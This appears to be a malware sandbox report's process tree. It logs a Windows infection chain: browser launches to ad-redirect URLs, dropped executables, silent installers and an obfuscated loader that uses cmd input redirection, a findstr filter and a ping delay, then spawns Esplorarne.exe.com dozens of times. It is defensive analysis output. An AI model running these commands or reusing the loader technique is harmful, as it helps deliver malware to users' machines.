C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:6176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:4524
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵PID:7216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:5812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵PID:4564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x100,0xcc,0x104,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:1824
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:7868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:3344
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:5544
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:6960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵PID:8072
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\96-28063-258-f058f-33a9beac047dd\Myxotojiwi.exe"C:\Users\Admin\AppData\Local\Temp\96-28063-258-f058f-33a9beac047dd\Myxotojiwi.exe"8⤵PID:7644
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2fgxwad.cwo\GcleanerEU.exe /eufive & exit9⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\i2fgxwad.cwo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\i2fgxwad.cwo\GcleanerEU.exe /eufive10⤵PID:5812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 29611⤵
- Program crash
PID:7580 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exeC:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe /qn CAMPAIGN="654"10⤵PID:4088
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:7216
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1bvqwlp.p4a\ufgaa.exe & exit9⤵PID:3236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe & exit9⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exeC:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe10⤵PID:6836
-
C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe"C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe" -q11⤵PID:5320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 76412⤵
- Program crash
PID:6584 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3lbe2is.yac\gcleaner.exe /mixfive & exit9⤵PID:3784
-
C:\Users\Admin\AppData\Local\Temp\x3lbe2is.yac\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\x3lbe2is.yac\gcleaner.exe /mixfive10⤵PID:3244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 29211⤵
- Program crash
PID:4004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5eae0ue.lgv\autosubplayer.exe /S & exit9⤵PID:7636
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:4456
-
C:\Users\Admin\AppData\Roaming\6961886.exe"C:\Users\Admin\AppData\Roaming\6961886.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5584 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5584 -s 23567⤵
- Program crash
PID:6972 -
C:\Users\Admin\AppData\Roaming\7773517.exe"C:\Users\Admin\AppData\Roaming\7773517.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5912 -
C:\Users\Admin\AppData\Roaming\1029648.exe"C:\Users\Admin\AppData\Roaming\1029648.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Users\Admin\AppData\Roaming\1309205.exe"C:\Users\Admin\AppData\Roaming\1309205.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5432 -
C:\Users\Admin\AppData\Roaming\3010462.exe"C:\Users\Admin\AppData\Roaming\3010462.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 24607⤵
- Program crash
PID:7108 -
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 16726⤵
- Program crash
PID:6936 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
PID:5024 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵PID:5164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2584 -
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\tmp5871_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp5871_tmp.exe"6⤵
- Executes dropped EXE
PID:1276 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:4336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵
- Executes dropped EXE
PID:1296 -
C:\Windows\SysWOW64\cmd.execmd8⤵PID:4772
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:7480
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
PID:6768 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5348 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵PID:7428
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵PID:8044
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵PID:7960
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵PID:6700
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵PID:2004
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:8120
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:6956
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵PID:4424
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:6472
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:3508
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:4580
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:7260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:6952
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:6760
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:6508
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6936 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:3332
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:6512
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵PID:5908
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:6508
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:6640
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:4548
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:4932
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵PID:6180
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵PID:4224
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵PID:1544
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵PID:7364
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5756 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵PID:4904
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵PID:7132
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵PID:3528
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵PID:1504
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵PID:6172
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵
- Modifies data under HKEY_USERS
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵PID:6204
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵PID:1892
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵PID:6240
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵PID:2320
-
